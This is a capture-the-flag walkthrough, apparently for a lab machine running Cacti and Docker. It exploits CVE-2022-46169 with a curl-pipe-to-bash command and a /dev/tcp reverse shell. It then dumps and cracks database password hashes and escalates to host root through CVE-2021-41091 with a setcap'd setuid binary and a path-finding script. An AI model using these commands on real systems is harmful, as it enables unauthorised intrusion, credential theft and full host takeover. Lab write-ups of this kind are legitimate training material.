Scanning

> TARGET=10.129.216.50 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Login to Cacti
|_http-favicon: Unknown favicon MD5: 4F12CCCD3C42A4A478F067337FE92794
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Foothold: www-data

  • Cacti is vulnerable to CVE-2022-46169 (unauthenticated command injection in remote_agent.php); the public PoC runs a command as www-data, so fetch shell.sh from our host and pipe it to bash
> python CVE-2022-46169/CVE-2022-46169.py http://10.129.216.50 -c 'curl http://<ip>/shell.sh -o - |bash'

# shell.sh
bash -i >& /dev/tcp/<ip>/4444 0>&1

User: marcus

  • Upload linpeas and note the SUID binary and the capability set below (both are useful for privilege escalation later)
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 31K Oct 14  2020 /sbin/capsh

[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
Current capabilities:
Current: cap_chown,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_audit_write,cap_setfcap=eip
  • /sbin/capsh is SUID root inside the container, so it hands us a root shell in the container (the root@50bca5e748b0 prompt used later)
> /sbin/capsh --gid=0 --uid=0 --
  • /entrypoint.sh runs mysql against the db container with the root credentials, so reuse them to dump the Cacti password hashes from the db
> mysql --host=db --user=root --password=root cacti -e "select username,password from user_auth;"

username        password
admin   $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
guest   43e9a4ab75570f5b
marcus  $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C
  • marcus's bcrypt hash ($2y$) cracks with john: funkymonkey
  • Login via ssh with that password and get the user flag
marcus@monitorstwo:~$ ls
user.txt
marcus@monitorstwo:~$ cat user.txt
8561613fe8d13a68d553679aad930f15

PE: root

  • Found mail for marcus that hints at the escalation path
marcus@monitorstwo:~$ cat /var/mail/marcus 
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Administrator
CISO
Monitor Two
Security Team
  • From the linpeas run in the container during foothold: the container's capability set includes cap_setfcap, so we can use setcap to put file capabilities on a binary of our own
  • Also, due to CVE-2021-41091, /var/lib/docker is traversable by unprivileged users on the host, so marcus can walk into the container's overlay2 merged directory and execute a file we planted there with a malicious capability set. The file capability is honoured on the host because Docker's default config does not remap user namespaces.
  • To exploit this we need two terminals: the reverse shell from the foothold steps, elevated to root in the container with capsh, and an ssh session as marcus on the host.
# in reverse shell session
root@50bca5e748b0:/home# gcc pe.c
pe.c: In function 'main':
pe.c:5:5: warning: implicit declaration of function 'setuid' [-Wimplicit-function-declaration]
    5 |     setuid(0);
      |     ^~~~~~

root@50bca5e748b0:/home# setcap cap_setuid+ep a.out

## the pe.c file is simple
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>   /* declares setuid(); the missing include caused the warning above */

int main(void) {
    if (setuid(0) != 0) {   /* succeeds because of the cap_setuid file capability */
        perror("setuid");
        return 1;
    }
    system("/usr/bin/bash");   /* real and effective uid are now 0, so bash keeps them */
    return 0;
}



# in ssh as marcus
marcus@monitorstwo:~$ /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/home/a.out
root@monitorstwo:~# cat /root/root.txt 
ad8e02bf86200743bacd8510331c5b1d
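The overlay2 id in the path above was looked up by hand. As an added example (not from the original write-up), the script below derives the host-side merged directory from the container's own /proc/mounts line and checks, from the host side, that the mount will honour file capabilities. The mount line is a constructed sample: the overlay id is the one from the write-up, the lowerdir names are made up.

```shell
#!/bin/sh
# Added example, not from the write-up: locate the host-side overlay2 path of
# the container without guessing the id, and check that file capabilities will
# be honoured. Step 1 runs inside the container, step 2 on the host as marcus.

# Constructed sample of the container's root mount line from /proc/mounts.
# The overlay id is the one from the write-up; the lowerdir names are made up.
SAMPLE_MOUNT='overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAAAAAAAAAAAAAAAAAAAAAA:/var/lib/docker/overlay2/l/BBBBBBBBBBBBBBBBBBBBBBBB,upperdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/diff,workdir=/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/work 0 0'

# Step 1 (inside the container): derive the host "merged" directory from the
# upperdir option. Docker keeps diff/, work/ and merged/ side by side under the
# same id, so stripping the trailing /diff and appending /merged gives the
# directory that marcus traverses via CVE-2021-41091. Returns 1 if the line
# carries no upperdir (i.e. it is not an overlay root mount).
merged_dir_from_mount_line() {
    upper=$(printf '%s\n' "$1" | tr ',' '\n' | sed -n 's/^upperdir=//p')
    [ -n "$upper" ] || return 1
    printf '%s/merged\n' "${upper%/diff}"
}

# Host path of a file that lives at $2 inside the container whose merged
# directory is $1.
host_path_for() {
    printf '%s%s\n' "$1" "$2"
}

# Step 2 (on the host): the kernel ignores file capabilities on nosuid mounts,
# so the setcap'd binary only elevates if the filesystem holding
# /var/lib/docker is not mounted nosuid. Takes the OPTIONS column of
# findmnt/mount and returns 0 when file caps will be honoured.
mount_honours_file_caps() {
    case ",$1," in
        *,nosuid,*) return 1 ;;
    esac
    return 0
}

# Live usage:
#   inside container:  merged_dir_from_mount_line "$(grep '^overlay / ' /proc/mounts)"
#   on host as marcus: mount_honours_file_caps "$(findmnt -no OPTIONS -T /var/lib/docker)"
# Stand-alone run on the constructed sample:
merged_dir_from_mount_line "$SAMPLE_MOUNT"
host_path_for "$(merged_dir_from_mount_line "$SAMPLE_MOUNT")" /home/a.out
```

Before executing the binary from the marcus session, `getcap` on the host path should print cap_setuid=ep; if it prints nothing, either the mount is nosuid or the container is running with user-namespace remapping, and this route will not work.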